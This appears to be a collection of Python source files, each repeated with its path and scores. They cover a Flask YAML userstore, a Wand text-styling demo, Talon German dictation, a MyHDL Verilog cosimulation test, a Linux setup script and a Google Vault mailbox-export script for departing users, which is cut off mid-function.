import os import yaml import logging from watchdog.observers import Observer from watchdog.events import FileSystemEventHandler from flask_securest.userstores import simple from flask_securest.constants import FLASK_SECUREST_LOGGER_NAME class FileUserstore(simple.SimpleUserstore, FileSystemEventHandler): def __init__(self, userstore_file_path): self.lgr = logging.getLogger(name=FLASK_SECUREST_LOGGER_NAME) self.userstore_file_path = os.path.abspath(userstore_file_path) self.users = None self.groups = None self.observer = Observer() self.observer.schedule(self, path=os.path.dirname( self.userstore_file_path), recursive=False) self.load_userstore() self.observer.start() def on_modified(self, event): if os.path.abspath(event.src_path) == self.userstore_file_path: self.load_userstore() def load_userstore(self): ''' This function updates the userstore in-case the file holding the data was modified. :return: ''' self.lgr.info('Loading userstore from {file}.' .format(file=self.userstore_file_path)) try: with open(self.userstore_file_path) as f: userstore = yaml.safe_load(f.read()) except (yaml.parser.ParserError, IOError) as e: err = 'Failed parsing {userstore_file} file. Users and groups ' \ 'will not be loaded. Error: {error}.'\ .format(userstore_file=self.userstore_file_path, error=str(e)) self.lgr.warning(err) raise ValueError(err) if isinstance(userstore, dict): if 'users' in userstore.keys(): self.users = userstore.get('users') else: err = 'Users not found in {file} yaml. Failed loading users.'\ .format(file=self.userstore_file_path) self.lgr.warning(err) raise ValueError(err) self.groups = userstore.get('groups') else: err = '{userstore_file} yaml is not a valid dict. Userstore ' \ 'file will not be loaded.'\ .format(userstore_file=self.userstore_file_path) self.lgr.warning(err) raise ValueError() self.lgr.info('Loading of userstore ended successfully.')
flask_securest/userstores/file_userstore.py
import os import yaml import logging from watchdog.observers import Observer from watchdog.events import FileSystemEventHandler from flask_securest.userstores import simple from flask_securest.constants import FLASK_SECUREST_LOGGER_NAME class FileUserstore(simple.SimpleUserstore, FileSystemEventHandler): def __init__(self, userstore_file_path): self.lgr = logging.getLogger(name=FLASK_SECUREST_LOGGER_NAME) self.userstore_file_path = os.path.abspath(userstore_file_path) self.users = None self.groups = None self.observer = Observer() self.observer.schedule(self, path=os.path.dirname( self.userstore_file_path), recursive=False) self.load_userstore() self.observer.start() def on_modified(self, event): if os.path.abspath(event.src_path) == self.userstore_file_path: self.load_userstore() def load_userstore(self): ''' This function updates the userstore in-case the file holding the data was modified. :return: ''' self.lgr.info('Loading userstore from {file}.' .format(file=self.userstore_file_path)) try: with open(self.userstore_file_path) as f: userstore = yaml.safe_load(f.read()) except (yaml.parser.ParserError, IOError) as e: err = 'Failed parsing {userstore_file} file. Users and groups ' \ 'will not be loaded. Error: {error}.'\ .format(userstore_file=self.userstore_file_path, error=str(e)) self.lgr.warning(err) raise ValueError(err) if isinstance(userstore, dict): if 'users' in userstore.keys(): self.users = userstore.get('users') else: err = 'Users not found in {file} yaml. Failed loading users.'\ .format(file=self.userstore_file_path) self.lgr.warning(err) raise ValueError(err) self.groups = userstore.get('groups') else: err = '{userstore_file} yaml is not a valid dict. Userstore ' \ 'file will not be loaded.'\ .format(userstore_file=self.userstore_file_path) self.lgr.warning(err) raise ValueError() self.lgr.info('Loading of userstore ended successfully.')
0.293708
0.062646
from wand.image import Image from wand.drawing import Drawing from wand.color import Color import os # this is original code. font_normal = 'Noto-Sans' font_italic = 'Noto-Sans-Italic' font_bold = 'Noto-Sans-Bold' if os.name == 'nt': font_normal = 'Arial' font_italic = 'Arial-Italic' font_bold = 'Arial-Bold' w = 500 h = 350 with Drawing() as draw: with Image(width=w, height=h, background=Color('lightblue')) as img: draw.font_size = 32 draw.fill_color = Color('blue') # [Style] draw.font = font_normal draw.text(0, 30, '[Style]') # Italic ( you must use italic-compliant font, e.g. Arial, ) draw.font = font_italic draw.font_style = 'italic' draw.text(0, 60, 'Italic') draw.font_style = 'normal' # default # Bold ( you must use bold-compliant font, e.g. Courier, ) draw.font = font_bold draw.text(0, 90, 'Bold') # Underline draw.font = font_normal draw.text_decoration = 'underline' draw.text(0, 120, 'Underline') # Is the line rather thin? # Overline draw.text_decoration = 'overline' draw.text(0, 160, 'Overline') # Strike draw.text_decoration = 'line_through' draw.text(0, 190, 'Strike') draw.text_decoration = 'no' # default # Non-Antialias draw.text_antialias = False draw.text(0, 220, 'Antialias-off') draw.text_antialias = True # default # [Stroke] draw.fill_color = Color('dodgerblue') draw.stroke_color = Color('blue') draw.stroke_width = 1 draw.text(200, 30, '[Stroke]') # Non-Antialias draw.stroke_antialias = False draw.text(200, 60, 'Antialias-off') draw.stroke_antialias = True # default # Opacity draw.stroke_opacity = 0.3 draw.text(200, 90, 'Opacity') draw.stroke_opacity = 1.0 # default # Width draw.stroke_width = 2.0 draw.text(200, 120, 'Width') draw.stroke_width = 1 draw.stroke_color = Color('none') # default # [Space] draw.fill_color = Color('blue') draw.text(200, 170, '[Space]') # Kerning draw.text_kerning = -2 draw.text(200, 200, 'Kerning=-2') draw.text_kerning = 0 draw.text(200, 230, 'Kerning=0') draw.text_kerning = 2 draw.text(200, 260, 'Kerning=2') draw.text_kerning = 0 # Word Space draw.text_interword_spacing = 10 draw.text(200, 290, 'Word Space 10') draw.text_interword_spacing = 20 draw.text(200, 320, 'Word Space 20') draw(img) img.save(filename='sample14.png')
examples/text/sample14_more_attributes.py
from wand.image import Image from wand.drawing import Drawing from wand.color import Color import os # this is original code. font_normal = 'Noto-Sans' font_italic = 'Noto-Sans-Italic' font_bold = 'Noto-Sans-Bold' if os.name == 'nt': font_normal = 'Arial' font_italic = 'Arial-Italic' font_bold = 'Arial-Bold' w = 500 h = 350 with Drawing() as draw: with Image(width=w, height=h, background=Color('lightblue')) as img: draw.font_size = 32 draw.fill_color = Color('blue') # [Style] draw.font = font_normal draw.text(0, 30, '[Style]') # Italic ( you must use italic-compliant font, e.g. Arial, ) draw.font = font_italic draw.font_style = 'italic' draw.text(0, 60, 'Italic') draw.font_style = 'normal' # default # Bold ( you must use bold-compliant font, e.g. Courier, ) draw.font = font_bold draw.text(0, 90, 'Bold') # Underline draw.font = font_normal draw.text_decoration = 'underline' draw.text(0, 120, 'Underline') # Is the line rather thin? # Overline draw.text_decoration = 'overline' draw.text(0, 160, 'Overline') # Strike draw.text_decoration = 'line_through' draw.text(0, 190, 'Strike') draw.text_decoration = 'no' # default # Non-Antialias draw.text_antialias = False draw.text(0, 220, 'Antialias-off') draw.text_antialias = True # default # [Stroke] draw.fill_color = Color('dodgerblue') draw.stroke_color = Color('blue') draw.stroke_width = 1 draw.text(200, 30, '[Stroke]') # Non-Antialias draw.stroke_antialias = False draw.text(200, 60, 'Antialias-off') draw.stroke_antialias = True # default # Opacity draw.stroke_opacity = 0.3 draw.text(200, 90, 'Opacity') draw.stroke_opacity = 1.0 # default # Width draw.stroke_width = 2.0 draw.text(200, 120, 'Width') draw.stroke_width = 1 draw.stroke_color = Color('none') # default # [Space] draw.fill_color = Color('blue') draw.text(200, 170, '[Space]') # Kerning draw.text_kerning = -2 draw.text(200, 200, 'Kerning=-2') draw.text_kerning = 0 draw.text(200, 230, 'Kerning=0') draw.text_kerning = 2 draw.text(200, 260, 'Kerning=2') draw.text_kerning = 0 # Word Space draw.text_interword_spacing = 10 draw.text(200, 290, 'Word Space 10') draw.text_interword_spacing = 20 draw.text(200, 320, 'Word Space 20') draw(img) img.save(filename='sample14.png')
0.429429
0.083404
import time import pickle import os.path import re from talon import ( Module, Context, actions, registry, ) from talon.grammar import Phrase from talon import speech_system, Context from talon.engines.vosk import VoskEngine vosk_de = VoskEngine(model="vosk-model-small-de-0.15", language="de_DE") vosk_de.set_vocab(["finish", "bapfel", "hückelhoven"]) speech_system.add_engine(vosk_de) capitalized_words = set() def load_dictionary(): global capitalized_words dictionary_path = os.path.realpath( os.path.join(os.path.abspath(__file__), "../../dictionary/german.dic") ) dictionary_cache_path = os.path.realpath( os.path.join(os.path.abspath(__file__), "../../dictionary/german.pickle") ) # load dictionary if not os.path.exists(dictionary_cache_path) or os.path.getmtime( dictionary_cache_path ) < os.path.getmtime(dictionary_path): # recreate cache with open(dictionary_path, encoding="ISO-8859-1") as file: for word in file: if word[0].isupper(): capitalized_words.add(word.lower().strip()) with open(dictionary_cache_path, "wb") as file: # Pickle the 'data' dictionary using the highest protocol available. pickle.dump(capitalized_words, file, pickle.HIGHEST_PROTOCOL) else: # read from cache with open(dictionary_cache_path, "rb") as file: capitalized_words = pickle.load(file) load_dictionary() mod = Module() mod.tag("german", desc="Start german dictation") ctx__activate = Context() ctx__activate.matches = "tag: user.german" ctx__activate.settings = { "speech.engine": "vosk", # 'speech.language': 'de_DE', "speech.timeout": 0.2, } ctx = Context() formatter = None end_after_speak = False class State: start_of_sentence = True latent_space = False dictation_state = State() punctuation_words = { "punkt": ".", "strich": ",", "ausrufezeichen": "!", "fragezeichen": "?", "doppelpunkt": ":", } end_of_sentence_words = { "!", "?", ".", } @mod.action_class class Actions: def activate_german(): """???""" ctx.tags = ["user.german"] def deactivate_german(): """???""" ctx.tags = [] def german_sentence(): """???""" global formatter, end_after_speak formatter = "sentence" end_after_speak = True actions.user.activate_german() def german_dictation(): """???""" global formatter, end_after_speak formatter = "dictation" end_after_speak = False dictation_state.start_of_sentence = True dictation_state.latent_space = False actions.user.activate_german() def german_words(): """???""" global formatter, end_after_speak formatter = "words" end_after_speak = True actions.user.activate_german() def german_process(phrase: Phrase): """???""" global formatter, end_after_speak if formatter == "sentence": text = phrase[0].upper() + phrase[1:] + "." elif formatter == "dictation": text = "" for word in phrase: # avoid space before following symbols if word == "eingabe" or word in punctuation_words: dictation_state.latent_space = False # insert space after last word if dictation_state.latent_space: text = text + " " dictation_state.latent_space = False if word in punctuation_words: # replace punctuation words text = text + punctuation_words[word] if punctuation_words[word] in end_of_sentence_words: dictation_state.start_of_sentence = True dictation_state.latent_space = True elif word == "eingabe": text = text + "\n" elif dictation_state.start_of_sentence or word in capitalized_words: # capitalize first word in sentence text = text + word[0].upper() + word[1:] dictation_state.start_of_sentence = False dictation_state.latent_space = True else: text = text + word dictation_state.latent_space = True else: text = phrase actions.insert(text) if end_after_speak: ctx.tags = [] def german_dictation_add(): """???""" print("to do")
adabru_talon/code/german.py
import time import pickle import os.path import re from talon import ( Module, Context, actions, registry, ) from talon.grammar import Phrase from talon import speech_system, Context from talon.engines.vosk import VoskEngine vosk_de = VoskEngine(model="vosk-model-small-de-0.15", language="de_DE") vosk_de.set_vocab(["finish", "bapfel", "hückelhoven"]) speech_system.add_engine(vosk_de) capitalized_words = set() def load_dictionary(): global capitalized_words dictionary_path = os.path.realpath( os.path.join(os.path.abspath(__file__), "../../dictionary/german.dic") ) dictionary_cache_path = os.path.realpath( os.path.join(os.path.abspath(__file__), "../../dictionary/german.pickle") ) # load dictionary if not os.path.exists(dictionary_cache_path) or os.path.getmtime( dictionary_cache_path ) < os.path.getmtime(dictionary_path): # recreate cache with open(dictionary_path, encoding="ISO-8859-1") as file: for word in file: if word[0].isupper(): capitalized_words.add(word.lower().strip()) with open(dictionary_cache_path, "wb") as file: # Pickle the 'data' dictionary using the highest protocol available. pickle.dump(capitalized_words, file, pickle.HIGHEST_PROTOCOL) else: # read from cache with open(dictionary_cache_path, "rb") as file: capitalized_words = pickle.load(file) load_dictionary() mod = Module() mod.tag("german", desc="Start german dictation") ctx__activate = Context() ctx__activate.matches = "tag: user.german" ctx__activate.settings = { "speech.engine": "vosk", # 'speech.language': 'de_DE', "speech.timeout": 0.2, } ctx = Context() formatter = None end_after_speak = False class State: start_of_sentence = True latent_space = False dictation_state = State() punctuation_words = { "punkt": ".", "strich": ",", "ausrufezeichen": "!", "fragezeichen": "?", "doppelpunkt": ":", } end_of_sentence_words = { "!", "?", ".", } @mod.action_class class Actions: def activate_german(): """???""" ctx.tags = ["user.german"] def deactivate_german(): """???""" ctx.tags = [] def german_sentence(): """???""" global formatter, end_after_speak formatter = "sentence" end_after_speak = True actions.user.activate_german() def german_dictation(): """???""" global formatter, end_after_speak formatter = "dictation" end_after_speak = False dictation_state.start_of_sentence = True dictation_state.latent_space = False actions.user.activate_german() def german_words(): """???""" global formatter, end_after_speak formatter = "words" end_after_speak = True actions.user.activate_german() def german_process(phrase: Phrase): """???""" global formatter, end_after_speak if formatter == "sentence": text = phrase[0].upper() + phrase[1:] + "." elif formatter == "dictation": text = "" for word in phrase: # avoid space before following symbols if word == "eingabe" or word in punctuation_words: dictation_state.latent_space = False # insert space after last word if dictation_state.latent_space: text = text + " " dictation_state.latent_space = False if word in punctuation_words: # replace punctuation words text = text + punctuation_words[word] if punctuation_words[word] in end_of_sentence_words: dictation_state.start_of_sentence = True dictation_state.latent_space = True elif word == "eingabe": text = text + "\n" elif dictation_state.start_of_sentence or word in capitalized_words: # capitalize first word in sentence text = text + word[0].upper() + word[1:] dictation_state.start_of_sentence = False dictation_state.latent_space = True else: text = text + word dictation_state.latent_space = True else: text = phrase actions.insert(text) if end_after_speak: ctx.tags = [] def german_dictation_add(): """???""" print("to do")
0.227813
0.102979
from __future__ import division from __future__ import print_function import os import argparse from argparse import Namespace import array import numpy as np from scipy import signal import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt from matplotlib import mlab from myhdl import * def _prep_cosim(args, **sigs): """ prepare the cosimulation environment """ # compile the verilog files with the verilog simulator files = ['../myhdl/mm_sop1.v', '../myhdl/mm_sop2.v', '../bsv/mkSOP1.v', '../bsv/mkSOP2.v', '../chisel/generated/mc_sop1.v', #'../chisel/generated/mc_sop2.v', './tb_mathsop.v',] print("compiling ...") cmd = "iverilog -o mathsop %s " % (" ".join(files)) print(" *%s" % (cmd)) os.system(cmd) # get the handle to the print("cosimulation setup ...") cmd = "vvp -m ./myhdl.vpi mathsop" if not os.path.exists("vcd"): os.makedirs("vcd") return Cosimulation(cmd, **sigs) def _create_chirp(args, imax=8): """generate a chirp signal, DUT input """ tarray = np.arange(args.Nsamps/2)*(1./args.Fs) # chirp(tarray, time zero freq, time end freq, end freq) xin = signal.chirp(tarray, 2, tarray[-1], 230, method=u'logarithmic') * .94 # chirp down and up xin = np.concatenate( (xin, np.array([-1*ss for ss in reversed(xin[:-1])]), -1*xin[:30], )) xin = map(int, [round(xx*imax) for xx in xin]) return xin def test_mathsop_verilogs(args): """the SOP (FIR filter) test stimulus """ clock = Signal(bool(0)) reset = ResetSignal(0, active=0, async=True) imin,imax = -2**15, 2**15 x = Signal(intbv(0, min=imin, max=imax)) (ym1,ym2, yb1,yb2, yc1,yc2,) = [Signal(intbv(0, min=imin, max=imax)) for _ in range(6)] tbdut = _prep_cosim(args, clock=clock, reset=reset, x=x, ym1=ym1, ym2=ym2, yb1=yb1, yb2=yb2, yc1=yc1, yc2=yc2) # create the inputs and output containers xhrp = _create_chirp(args, imax=imax) ym1v = array.array('h', [0 for _ in range(args.Nsamps)]) ym2v = array.array('h', [0 for _ in range(args.Nsamps)]) yb1v = array.array('h', [0 for _ in range(args.Nsamps)]) yb2v = array.array('h', [0 for _ in range(args.Nsamps)]) yc1v = array.array('h', [0 for _ in range(args.Nsamps)]) yc2v = array.array('h', [0 for _ in range(args.Nsamps)]) @always(delay(3)) def tbclk(): clock.next = not clock @instance def tbstim(): reset.next = reset.active yield delay(33) reset.next = not reset.active yield clock.posedge yvals = [] for ii,xx in enumerate(xhrp): if ii < 16: print("%08X: x %7d: mm1 %7d, mm2 %7d, mb %7d, mc %7d" % \ (now(), x, ym1, ym2, yb1, yc1)) # set the next input and save all current outputs if ii >= args.Nsamps: break x.next = xx ym1v[ii],ym2v[ii] = ym1,ym2 yb1v[ii],yb2v[ii] = yb1,yb2 yc1v[ii],yc2v[ii] = yc1,yc2 yield clock.posedge # simulation complete inform the simulator raise StopSimulation print("start (co)simulation ...") Simulation((tbdut, tbstim, tbclk,)).run() colors = matplotlib.rcParams['axes.color_cycle'] fig,axl = plt.subplots(7, sharex=True, figsize=(12,7)) labels = ('input', 'bsv', '*', 'chisel', '**', 'myhdl', '***', ) xlen = len(xhrp) for ax,dd,cc,ll in zip(axl, (xhrp, yb1v, yb2v, yc1v, yc2v, ym1v, ym2v,), colors[:7], labels): ax.plot(dd, color=cc, linewidth=2) ax.set_ylim(imin, imax) ax.set_xlim(-500, xlen+100) ax.text(-450, 0, ll, color='#003366', fontsize=16, fontweight='bold') #ax.set_yticklabels([]) fig.subplots_adjust(hspace=0) for ax in axl: ax.set_yticks((imin/2,0,imax/2,)) ax.set_yticklabels(('-.5FS', '0', '.5FS',)) # save the figure if not os.path.exists("plots"): os.makedirs("plots") for ext in ('png','pdf',): fig.savefig("plots/mathsop_time_response.%s"%(ext)) if __name__ == '__main__': args = Namespace( Nsamps=1024*4, # number of samples to test Fs=1e3, # sample rate mmver=1, # two MyHDL versions trace=True # enable tracing ) test_mathsop_verilogs(args)
examples/ex4_mathsop/test_verilogs/test_mathsop.py
from __future__ import division from __future__ import print_function import os import argparse from argparse import Namespace import array import numpy as np from scipy import signal import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt from matplotlib import mlab from myhdl import * def _prep_cosim(args, **sigs): """ prepare the cosimulation environment """ # compile the verilog files with the verilog simulator files = ['../myhdl/mm_sop1.v', '../myhdl/mm_sop2.v', '../bsv/mkSOP1.v', '../bsv/mkSOP2.v', '../chisel/generated/mc_sop1.v', #'../chisel/generated/mc_sop2.v', './tb_mathsop.v',] print("compiling ...") cmd = "iverilog -o mathsop %s " % (" ".join(files)) print(" *%s" % (cmd)) os.system(cmd) # get the handle to the print("cosimulation setup ...") cmd = "vvp -m ./myhdl.vpi mathsop" if not os.path.exists("vcd"): os.makedirs("vcd") return Cosimulation(cmd, **sigs) def _create_chirp(args, imax=8): """generate a chirp signal, DUT input """ tarray = np.arange(args.Nsamps/2)*(1./args.Fs) # chirp(tarray, time zero freq, time end freq, end freq) xin = signal.chirp(tarray, 2, tarray[-1], 230, method=u'logarithmic') * .94 # chirp down and up xin = np.concatenate( (xin, np.array([-1*ss for ss in reversed(xin[:-1])]), -1*xin[:30], )) xin = map(int, [round(xx*imax) for xx in xin]) return xin def test_mathsop_verilogs(args): """the SOP (FIR filter) test stimulus """ clock = Signal(bool(0)) reset = ResetSignal(0, active=0, async=True) imin,imax = -2**15, 2**15 x = Signal(intbv(0, min=imin, max=imax)) (ym1,ym2, yb1,yb2, yc1,yc2,) = [Signal(intbv(0, min=imin, max=imax)) for _ in range(6)] tbdut = _prep_cosim(args, clock=clock, reset=reset, x=x, ym1=ym1, ym2=ym2, yb1=yb1, yb2=yb2, yc1=yc1, yc2=yc2) # create the inputs and output containers xhrp = _create_chirp(args, imax=imax) ym1v = array.array('h', [0 for _ in range(args.Nsamps)]) ym2v = array.array('h', [0 for _ in range(args.Nsamps)]) yb1v = array.array('h', [0 for _ in range(args.Nsamps)]) yb2v = array.array('h', [0 for _ in range(args.Nsamps)]) yc1v = array.array('h', [0 for _ in range(args.Nsamps)]) yc2v = array.array('h', [0 for _ in range(args.Nsamps)]) @always(delay(3)) def tbclk(): clock.next = not clock @instance def tbstim(): reset.next = reset.active yield delay(33) reset.next = not reset.active yield clock.posedge yvals = [] for ii,xx in enumerate(xhrp): if ii < 16: print("%08X: x %7d: mm1 %7d, mm2 %7d, mb %7d, mc %7d" % \ (now(), x, ym1, ym2, yb1, yc1)) # set the next input and save all current outputs if ii >= args.Nsamps: break x.next = xx ym1v[ii],ym2v[ii] = ym1,ym2 yb1v[ii],yb2v[ii] = yb1,yb2 yc1v[ii],yc2v[ii] = yc1,yc2 yield clock.posedge # simulation complete inform the simulator raise StopSimulation print("start (co)simulation ...") Simulation((tbdut, tbstim, tbclk,)).run() colors = matplotlib.rcParams['axes.color_cycle'] fig,axl = plt.subplots(7, sharex=True, figsize=(12,7)) labels = ('input', 'bsv', '*', 'chisel', '**', 'myhdl', '***', ) xlen = len(xhrp) for ax,dd,cc,ll in zip(axl, (xhrp, yb1v, yb2v, yc1v, yc2v, ym1v, ym2v,), colors[:7], labels): ax.plot(dd, color=cc, linewidth=2) ax.set_ylim(imin, imax) ax.set_xlim(-500, xlen+100) ax.text(-450, 0, ll, color='#003366', fontsize=16, fontweight='bold') #ax.set_yticklabels([]) fig.subplots_adjust(hspace=0) for ax in axl: ax.set_yticks((imin/2,0,imax/2,)) ax.set_yticklabels(('-.5FS', '0', '.5FS',)) # save the figure if not os.path.exists("plots"): os.makedirs("plots") for ext in ('png','pdf',): fig.savefig("plots/mathsop_time_response.%s"%(ext)) if __name__ == '__main__': args = Namespace( Nsamps=1024*4, # number of samples to test Fs=1e3, # sample rate mmver=1, # two MyHDL versions trace=True # enable tracing ) test_mathsop_verilogs(args)
0.524882
0.372448
from subprocess import call import pexpect class LinuxInit(): def __init__(self): pass # 0.更新源和软件 def update_env(self): # cmd = "sudo apt-get update;sudo apt-get upgrade;sudo apt-get install -y python-dev" install_cmd = "sudo apt-get install -y python-dev" process = pexpect.spawn(install_cmd, timeout=30) process.expect("sudo") process.send("xxx\n") output = process.read() print(output) # 1.创建目录 def create_directory(self): cmd = "cd $HOME;mkdir lib;cd lib;mkdir tool src doc;ls -l" call(cmd, shell=True) call("ls -l", shell=True) # 2.安装软件:git/vim/pip # [done]getpass input password. def install_software(self): install_cmd = "sudo apt-get install -y git vim python-pip mongodb curl docker docker.io mysql-server mysql-client libmysqlclient-dev" process = pexpect.spawn(install_cmd, timeout=30) process.expect("sudo") process.send("xxx\n") output = process.read() print(output) # 3.安装第三方库 def pip_install(self): third_libs = ['wget', 'pep8', 'scrapy', 'paramiko', 'django', 'pymongo', 'selenium', 'mysql', 'numpy', 'pandas', 'tensorflow', 'testrepository', 'opencv-python', 'apidoc'] for third_lib in third_libs: call("pip install " + third_lib, shell=True) # 4.下载源码 def download_src(self): src_addr = ['<EMAIL>:Ethan16/python_misc.git', '<EMAIL>:Ethan16/crawl.git', '<EMAIL>:Ethan16/c_cpp_misc.git', '<EMAIL>:Ethan16/tcl_misc.git', '<EMAIL>:Ethan16/shell_misc.git', '<EMAIL>:Ethan16/bat_ps_misc.git'] public_addr = ['https://github.com/torvalds/linux.git', 'https://github.com/qemu/qemu.git', 'https://github.com/stanzhai/be-a-professional-programmer.git', 'https://github.com/jobbole/awesome-python-cn.git', 'https://github.com/scrapy/scrapy.git', 'https://github.com/SeleniumHQ/selenium.git', 'https://github.com/wangshub/Douyin-Bot.git', 'https://github.com/tensorflow/tensorflow.git', 'https://github.com/cuanboy/ScrapyProject.git'] # call("cd $HOME/lib/src/") for src in src_addr + public_addr: call("cd $HOME/lib/src/;git clone " + src, shell=True) call("ls -l") if __name__ == '__main__': init = LinuxInit() init.update_env() init.create_directory() init.install_software() init.pip_install() init.download_src()
linux_init/linux_init.py
from subprocess import call import pexpect class LinuxInit(): def __init__(self): pass # 0.更新源和软件 def update_env(self): # cmd = "sudo apt-get update;sudo apt-get upgrade;sudo apt-get install -y python-dev" install_cmd = "sudo apt-get install -y python-dev" process = pexpect.spawn(install_cmd, timeout=30) process.expect("sudo") process.send("xxx\n") output = process.read() print(output) # 1.创建目录 def create_directory(self): cmd = "cd $HOME;mkdir lib;cd lib;mkdir tool src doc;ls -l" call(cmd, shell=True) call("ls -l", shell=True) # 2.安装软件:git/vim/pip # [done]getpass input password. def install_software(self): install_cmd = "sudo apt-get install -y git vim python-pip mongodb curl docker docker.io mysql-server mysql-client libmysqlclient-dev" process = pexpect.spawn(install_cmd, timeout=30) process.expect("sudo") process.send("xxx\n") output = process.read() print(output) # 3.安装第三方库 def pip_install(self): third_libs = ['wget', 'pep8', 'scrapy', 'paramiko', 'django', 'pymongo', 'selenium', 'mysql', 'numpy', 'pandas', 'tensorflow', 'testrepository', 'opencv-python', 'apidoc'] for third_lib in third_libs: call("pip install " + third_lib, shell=True) # 4.下载源码 def download_src(self): src_addr = ['<EMAIL>:Ethan16/python_misc.git', '<EMAIL>:Ethan16/crawl.git', '<EMAIL>:Ethan16/c_cpp_misc.git', '<EMAIL>:Ethan16/tcl_misc.git', '<EMAIL>:Ethan16/shell_misc.git', '<EMAIL>:Ethan16/bat_ps_misc.git'] public_addr = ['https://github.com/torvalds/linux.git', 'https://github.com/qemu/qemu.git', 'https://github.com/stanzhai/be-a-professional-programmer.git', 'https://github.com/jobbole/awesome-python-cn.git', 'https://github.com/scrapy/scrapy.git', 'https://github.com/SeleniumHQ/selenium.git', 'https://github.com/wangshub/Douyin-Bot.git', 'https://github.com/tensorflow/tensorflow.git', 'https://github.com/cuanboy/ScrapyProject.git'] # call("cd $HOME/lib/src/") for src in src_addr + public_addr: call("cd $HOME/lib/src/;git clone " + src, shell=True) call("ls -l") if __name__ == '__main__': init = LinuxInit() init.update_env() init.create_directory() init.install_software() init.pip_install() init.download_src()
0.280222
0.054224
import requests import json import sys #get the secrets from your Google Cloud project, use the Oauth2 Playground for your refresh token client_id=sys.argv[1] client_secret=sys.argv[2] refresh_token=sys.argv[3] credentials=sys.argv[4] def get_list_from_file(filename): try: # open and read the file into list with open(filename) as f: string_list = f.read().splitlines() f.close() print(string_list) return string_list except: print("\033[1m"+"Issue Occured with obtaining list from file"+"\033[0m") sys.exit(1) def generate_vault_access_token(client_id,client_secret,refresh_token): try: url = "https://www.googleapis.com/oauth2/v4/token" body = json.dumps({ "client_id": client_id, "client_secret": client_secret, "refresh_token": refresh_token, "grant_type": "refresh_token" }) headers = { "Accept" : "application/json", "Content-Type" : "application/json", } response = requests.request( "POST", url, headers=headers, data=body ) jsonContent = json.loads(response.text) vaultAccessToken = jsonContent["access_token"] return vaultAccessToken except: print("\033[1m"+"Issue Occured with generating Google Vault Access Token"+"\033[0m") sys.exit(1) def generate_matter(leaver_user,vaultAccessToken): try: matterList = [] for user in leaver_user: url = "https://vault.googleapis.com/v1/matters/" headers = { "Accept" : "application/json", "Content-Type" : "application/json", "Authorization": "Bearer " + vaultAccessToken } body = json.dumps ({ "state": "OPEN", "description": "Generated by Python", "name": user + "'s archive" }) response = requests.request( "POST", url, headers=headers, data=body ) jsonContent = json.loads(response.text) matterID=jsonContent["matterId"] #print("Matter ID for " + user + " is " + matterID) print(jsonContent) matterList.append({ "matterInstance": { "user": user, "userInfo": { "matterID": matterID, "savedQueryID": "", "matterExportID": "" } } }) return matterList except: print("\033[1m"+"Issue Occured with generating Google Vault Matter"+"\033[0m") sys.exit(1) def generate_search_query(matterList,vaultAccessToken): try: for matter in matterList: matterList = [] for key, value in matter.items(): user=(matter['matterInstance']['user']) matterID=(matter['matterInstance']['userInfo']['matterID']) url = "https://vault.googleapis.com/v1/matters/"+matterID+"/savedQueries" headers = { "Accept" : "application/json", "Content-Type" : "application/json", "Authorization": "Bearer " + vaultAccessToken } body=json.dumps({ "displayName": user + "'s email search query", "query": { "corpus": "MAIL", "dataScope": "ALL_DATA", "searchMethod": "ACCOUNT", "accountInfo": { "emails": [user]}, "mailOptions": {"excludeDrafts" : "false"}, "timeZone": "Atlantic/Canary", "method": "ACCOUNT" }} ) response = requests.request( "POST", url, headers=headers, data=body ) jsonContent = json.loads(response.text) print(jsonContent) savedQueryID=jsonContent["savedQueryId"] #print("savedQueryId for " + user + " is " + savedQueryID + " matterID is " + matterID) matterList.append({ "matterInstance": { "user": user, "userInfo": { "matterID": matterID, "savedQueryID": savedQueryID, "matterExportID": "" } } } ) return matterList except: print("\033[1m"+"Issue Occured with generating Google Vault Matter Search Query"+"\033[0m") sys.exit(1) def generate_export(savedQueryID,matterList,vaultAccessToken): try: for matter in matterList: matterList = [] for key, value in matter.items(): user=(matter['matterInstance']['user']) matterID=(matter['matterInstance']['userInfo']['matterID']) savedQueryID=(matter['matterInstance']['userInfo']['savedQueryID']) print(user,matterID,savedQueryID) url = "https://vault.googleapis.com/v1/matters/",matterID,"/exports" url=''.join(url) print(url) headers = { "Accept" : "application/json", "Content-Type" : "application/json", "Authorization": "Bearer " + vaultAccessToken } body = json.dumps( { "name": user + "'s Export", "query": { "corpus": "MAIL", "dataScope": "ALL_DATA", "searchMethod": "ACCOUNT", "accountInfo": { "emails": [user]}, "mailOptions": {"excludeDrafts" : "false"}, "timeZone": "Atlantic/Canary", "method": "Account", }, "exportOptions": { "mailOptions": { "exportFormat": "MBOX", "showConfidentialModeContent": "true" }, "region": "any" } } ) response = requests.request( "POST", url, headers=headers, data=body ) jsonContent = json.loads(response.text) matterExportID=jsonContent["id"] print(jsonContent) #print("matterExportID for " + user + " is " + matterExportID + " searchQueryID is " + savedQueryID + " matterID is " + matterID) matterList.append({ "matterInstance": { "user": user, "userInfo": { "matterID": matterID, "savedQueryID": savedQueryID, "matterExportID": matterExportID } } } ) return matterList except: print("\033[1m"+"Issue Occured with generating Google Vault Matter Export"+"\033[0m") sys.exit(1) def set_matter_permissions(adminAccountIDs,matterList,vaultAccessToken): try: for matter in matterList: matterList = [] for key, value in matter.items(): for each in adminAccountIDs: print(each) print(matterList) matterID=(matter['matterInstance']['userInfo']['matterID']) url = "https://vault.googleapis.com/v1/matters/",matterID,":addPermissions" print(url) url=''.join(url) print(url) headers = { "Accept" : "application/json", "Content-Type" : "application/json", "Authorization": "Bearer " + vaultAccessToken } body = json.dumps( { "matterPermission": { "role": "COLLABORATOR", "accountId": each }, "sendEmails": "false", "ccMe": "false" } ) response = requests.request( "POST", url, headers=headers, data=body ) jsonContent = (response.text) print(jsonContent) return each except: print("\033[1m"+"Issue Occured with setting Google Vault Matter permissions"+"\033[0m") sys.exit(1) def generate_links_notify(matterList,credentials): try: for matter in matterList: matterList = [] user=(matter['matterInstance']['user']) matterID=(matter['matterInstance']['userInfo']['matterID']) savedQueryID=(matter['matterInstance']['userInfo']['savedQueryID']) exportID=(matter['matterInstance']['userInfo']['matterExportID']) print("************************************************************************************************************************************************************************************************************************************************************") print("Export Link for " + user + " https://vault.google.com/matter/"+ matterID + "/exports") print("Matter Link for " + user + " https://vault.google.com/matter/"+ matterID) print("Search Query Link for " + user + " https://vault.google.com/matter/"+ matterID + "/search") print("************************************************************************************************************************************************************************************************************************************************************") 